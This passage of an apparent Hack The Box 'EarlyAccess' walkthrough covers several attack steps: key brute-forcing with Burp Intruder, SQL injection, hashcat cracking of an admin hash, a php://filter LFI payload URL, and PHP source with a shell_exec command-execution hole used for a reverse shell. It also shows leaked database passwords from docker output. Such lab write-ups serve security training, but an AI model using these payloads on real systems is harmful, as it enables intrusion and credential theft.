                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
